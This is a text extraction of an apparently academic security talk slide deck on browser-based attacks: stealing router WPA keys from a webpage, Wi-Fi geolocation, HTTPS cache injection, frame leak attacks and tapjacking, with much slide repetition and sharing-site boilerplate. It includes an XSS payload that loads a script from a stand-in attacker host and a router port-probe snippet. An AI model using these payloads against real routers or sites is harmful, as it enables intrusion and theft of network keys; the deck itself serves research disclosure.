Bad Memories: Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Stanford University

Bad Memories
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Stanford University
Catcher
Bad Memories leads to conict

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
How to break a security mechanism
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
Bad memories
http://ly.tl/t9
1. Find a design aw
Bad memories
http://ly.tl/t9
1. Find a design aw 2. Exploit implementation vulnerability
Bad memories
http://ly.tl/t9
1. Find a design aw 2. Exploit implementation vulnerability 3. Make it irrelevant
Bad memories
http://ly.tl/t9
1. Find a design aw 2. Exploit implementation vulnerability 3. Make it irrelevant Focus of this talk
Bad memories
http://ly.tl/t9
Irrelevant ?
Bad memories
http://ly.tl/t9
Irrelevant ?
Secure protocol
Bad memories
http://ly.tl/t9
Irrelevant ?
Secure protocol
Side Channel
Bad memories
http://ly.tl/t9
Irrelevant ?
Secure protocol
Side Channel
Bad memories
http://ly.tl/t9
Outline
Bad memories
http://ly.tl/t9
Outline
Breaking into a WPA network with a webpage
Bad memories
http://ly.tl/t9
Outline
Breaking into a WPA network with a webpage Attacking HTTPS with cache injection
Bad memories
http://ly.tl/t9
Outline
Breaking into a WPA network with a webpage Attacking HTTPS with cache injection Stealing private data with frame leak attacks
Bad memories
http://ly.tl/t9
Outline
Breaking into a WPA network with a webpage Attacking HTTPS with cache injection Stealing private data with frame leak attacks Owning phone with clickjacking on steroids
Bad memories
http://ly.tl/t9
Breaking into a WPA network with a Webpage
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt Dan Boneh Rydstedt,
Bad memories
http://ly.tl/t9
Toward a secure world ?
Bad memories
http://ly.tl/t9
WEP
Bad memories
http://ly.tl/t9
WEP
WPA
Bad memories
http://ly.tl/t9
WEP
WPA
Secret key are still stored via a web interface

Some routers
Bad memories
http://ly.tl/t9
Getting the key from a web page
Bad memories
http://ly.tl/t9
Ads poisoning
http://blog.avast.com/2010/02/18/ads-poisoning--jsprontex
Browser same origin policy (SOP)
http://evil.com
http://mail.google.com
Bad memories
http://ly.tl/t9
Post
http://evil.com
http://mail.google.com
Bad memories
http://ly.tl/t9
Post Read
http://evil.com http://mail.google.com
Bad memories
http://ly.tl/t9

.js
Internet
Bad memories
http://ly.tl/t9
Internet
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9

192.168.0.1
Bad memories
http://ly.tl/t9
192.168.1.1
Bad memories
http://ly.tl/t9
192.168.2.1
Bad memories
http://ly.tl/t9
Same origin policy limitation
Same origin policy prevents us from knowing what kind of authentication the router use
Bad memories
http://ly.tl/t9
Same origin policy prevents us from knowing what kind of authentication the router use
Firefox vulnerabilities
Bad memories
http://ly.tl/t9

<img src=e.jpg/>
192.168.2.1:1372
Bad memories
http://ly.tl/t9

<img src=e.jpg/>
192.168.2.1:1372
Bad memories
http://ly.tl/t9
Brand A Model XY
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Same origin policy prevents us from reading router WPA key
Bad memories
http://ly.tl/t9
Same origin policy prevents us from reading router WPA key
Router XSS vulnerabilities (5 / 8 brands)

<script src=http://badguy.com/script.js/>
Bad memories
http://ly.tl/t9
<script src=http://badguy.com/script.js/>
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
No XSS ?
What if we cant nd a XSS or it is not exploitable ?
Bad memories
http://ly.tl/t9
No XSS ? No problem !
Use Clickjacking drag and drop attack by P. Stone !
Bad memories
http://ly.tl/t9
No XSS ? No problem !
Use Clickjacking drag and drop attack by P. Stone ! 8/8 Router brands are vulnerable to clickjacking
Bad memories
http://ly.tl/t9
Internet
Bad memories
http://ly.tl/t9
Internet
Bad memories
http://ly.tl/t9
Where are you ?
Weve go the key but
were is the network ?
Also found by Sami Kemvar

Where are you ?
Weve go the key but
were is the network ?
pp a an ! is at re th e r Th fo
Also found by Sami Kemvar

Firefox Locate me protocol
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Behind the curtain
Bad memories
http://ly.tl/t9
Wi SSID Victim
MAC @ E2:54:D7:1A
Does not accept POST XHR
Bad memories
http://ly.tl/t9
{ "host" : "Test","radio_type" : "unknown", "request_address" : true, "version" : "1.1.0", "wi_towers" : [ {"mac_address" :"E2:54:D7:1A", "ssid" : "Victim" }]}";
Wi SSID Victim
MAC @ E2:54:D7:1A
Bad memories
http://ly.tl/t9
{"latitude" : 128.51 , "longitude : : -58.23, address: "Victim location ..."}
Wi SSID Victim
MAC @ E2:54:D7:1A
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
{"latitude" : 128.51 , "longitude : : -58.23}
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
WPA Breaker demo
Bad memories
http://ly.tl/t9
Attacking HTTPS via cache injection
Bad memories
http://ly.tl/t9
The Plan
Background Cache Injection attack Defenses ? By passing the defenses
Bad memories
http://ly.tl/t9
Anatomy of web page

js html jpg ash
Bad memories
http://ly.tl/t9
Anatomy of web page

js jpg ash
html
Bad memories
http://ly.tl/t9
Anatomy of web page

js jpg ash
Bad memories
http://ly.tl/t9
Anatomy of web page

js ash
Bad memories
http://ly.tl/t9
Anatomy of web page

ash
Bad memories
http://ly.tl/t9
Anatomy of web page
Bad memories
http://ly.tl/t9
Browser caching
.html
.html
.js
.js
Bad memories
http://ly.tl/t9
Browser caching
.html
.js
.js
Bad memories
http://ly.tl/t9
Browser caching
.html
.js
Bad memories
http://ly.tl/t9
Browser caching
.js
Bad memories
http://ly.tl/t9
Browser caching
.js
Bad memories
http://ly.tl/t9
43% of the Alexa top 100,000 web sites use at least one external javascript library
Bad memories
http://ly.tl/t9
Most used libraries

Google analytics JQuery swfobjects Google syndication Prototype Quanta Yahoo Mootool Addthis Facebook Scriptaculous Omniture Dojo 0 3750 7500 11250 15000
Bad memories
http://ly.tl/t9
Attack scenario
.html
.js
Bad memories
http://ly.tl/t9
Attack scenario
.html
.js
Bad memories
http://ly.tl/t9
Attack scenario
.js
Bad memories
http://ly.tl/t9
Attack scenario
.js
Bad memories
http://ly.tl/t9
Later... ...
Bad memories
http://ly.tl/t9
Attack scenario
.html
.js
Bad memories
http://ly.tl/t9
Attack scenario
.js
Bad memories
http://ly.tl/t9
Attack scenario
.js
Bad memories
http://ly.tl/t9
Shared library and cache
A single malicious library cached leads to multiple compromised HTTPS sessions
Bad memories
http://ly.tl/t9
JQuery
Bad memories
http://ly.tl/t9
JQuery
Google analytics
Bad memories
http://ly.tl/t9
Defending against injection attack
Bad memories
http://ly.tl/t9
How to inject a malicious shared library ?
Bad memories
http://ly.tl/t9
Trust the user
https://twitter.com
Trust the user
Bad memories
http://ly.tl/t9
Comodo
92% of SSL certicates are invalid

Ivan Ristic Qualys
Firefox Study
Site Identity
Bad memories
http://ly.tl/t9
How many user click on the identity info ?
9%
3.4%
1.4%
Mozilla
Weakening SSL warning
What about tricking the browser so it doesnt display the standard warning ?
Bad memories
http://ly.tl/t9
IE standard warning
Bad memories
http://ly.tl/t9
IE : demo
Bad memories
http://ly.tl/t9
IE: another inconsistency
Bad memories
http://ly.tl/t9
Firefox standard warning
Bad memories
http://ly.tl/t9
Firefox challenge
We are not able to remove the warning
Bad memories
http://ly.tl/t9
Clickjacking 101
Bad memories
http://ly.tl/t9
Clickjacking 101
Bad memories
http://ly.tl/t9
Clickjacking 101
Bad memories
http://ly.tl/t9
Firefox challenge solved
Bad memories
http://ly.tl/t9
Firefox challenge solved
Not able to remove the warning doesnt mean we cant clickjack it
Bad memories
http://ly.tl/t9
Firefox clickjacking demo
Bad memories
http://ly.tl/t9
Stealing private data using frame leak attacks
Bad memories
http://ly.tl/t9
Clickjacking history
Coined by J. Grossman and R. Hansen in 2008 Scrolling attack by P. Stone 2010
Bad memories
http://ly.tl/t9
Frame leak attack

src = http://www.m.yahoo.com
Bad memories
http://ly.tl/t9
Frame leak attack

src = http://www.m.yahoo.com
id=checkbox-29
Bad memories
http://ly.tl/t9
Frame leak attack

src = http://www.m.yahoo.com.com#checkbox-29 id=checkbox-29
leftScroll : 0 topScroll : 10
Bad memories
http://ly.tl/t9
Yahoo frame leak attack demo
Bad memories
http://ly.tl/t9
The Facebook clickjacking defense
Bad memories
http://ly.tl/t9

www.badguy.com
Bad memories
http://ly.tl/t9

www.badguy.com
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Facebook frame leak attack demo
Bad memories
http://ly.tl/t9
Vulnerability xed
Facebook updated their clickjacking defense, they are not displaying your info behind the black div anymore
Bad memories
http://ly.tl/t9
Tapjacking: clickjacking on steroid
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt
Bad memories
http://ly.tl/t1
54 Millions of smartphone sold during the 1Q 2010
rise of smartphone (stats)
53% of Alexa top 500 websites have a mobile site
Bad memories
http://ly.tl/t9
Phone Usability
Phone browsers provide specic usability features These features give the attacker a complete control
over the screen real estate

The attacker can also zoom to the element of his
choice
Yuan Niu, Francis Hsu, Hao Chen 2008

Session handling
Browsers kill session cookies, Mobiles dont Non-session cookies tends to live longer on mobile
sites
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt
Slide deck 2010
http://ly.tl/t1
Phishing demo
Phishing demo
Elie Bursztein
Slide deck 2010
http://ly.tl/t1
Spoong the URL bar
Bad memories
http://ly.tl/t9
Tapjacking
Tapjacking ?
Bad memories
http://ly.tl/t9
Tapjacking ?
Tapjacking = clickjacking on steroids

Clickjacking protection among Alexa Top sites

100%
Regular sites
75%
50%
25%
0%
Top 10
Top 100
Bad memories
Top 500
Alexa
http://ly.tl/t9
Clickjacking protection among Alexa Top sites

100%
mobile sites
75%
50%
25%
0%
Top 10
Top 100
Bad memories
Top 500
Alexa
http://ly.tl/t9
Tapjacking demo
Twitter demo
Elie Bursztein
Slide deck 2010
http://ly.tl/t1
Vulnerability xed
The Twitter mobile website now use a framebusting code
Elie Bursztein
Slide deck 2010
http://ly.tl/t1
Conclusion
WPA key can be stolen from a web page
Wi network can be geo-localized within 500 meters
Compromise SSL sessions using caching attacks

A single injection allows to target multiple web sites
Break the same origin policy via Frame leak attack Tap-jacking : clickjacking on steroids for smartphones
Mobile sites must prevent framing !
For the videos and the latest version of the slides go to http://ly.tl/t9
Bad memories
http://ly.tl/t9

Bad Memories: Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Stanford University

Transféré par

Informations du document

Description originale:

Titre original

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

Bad Memories: Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Stanford University

Transféré par

Droits d'auteur :

Formats disponibles

Bad Memories

Bad Memories leads to conict

How to break a security mechanism

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

How to break a security mechanism

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

How to break a security mechanism

1. Find a design aw 2. Exploit implementation vulnerability

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

How to break a security mechanism

1. Find a design aw 2. Exploit implementation vulnerability 3. Make it irrelevant

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

How to break a security mechanism

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Breaking into a WPA network with a webpage

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Breaking into a WPA network with a Webpage

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt Dan Boneh Rydstedt,

Toward a secure world ?

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Toward a secure world ?

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Toward a secure world ?

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Toward a secure world ?

Secret key are still stored via a web interface

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Getting the key from a web page

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Browser same origin policy (SOP)

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Browser same origin policy (SOP)

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Browser same origin policy (SOP)

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Getting the key from a web page

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Getting the key from a web page

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Getting the key from a web page

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Getting the key from a web page

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Getting the key from a web page

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Getting the key from a web page

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Same origin policy limitation

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Same origin policy limitation

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Getting the key from a web page

Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh

Getting the key from a web page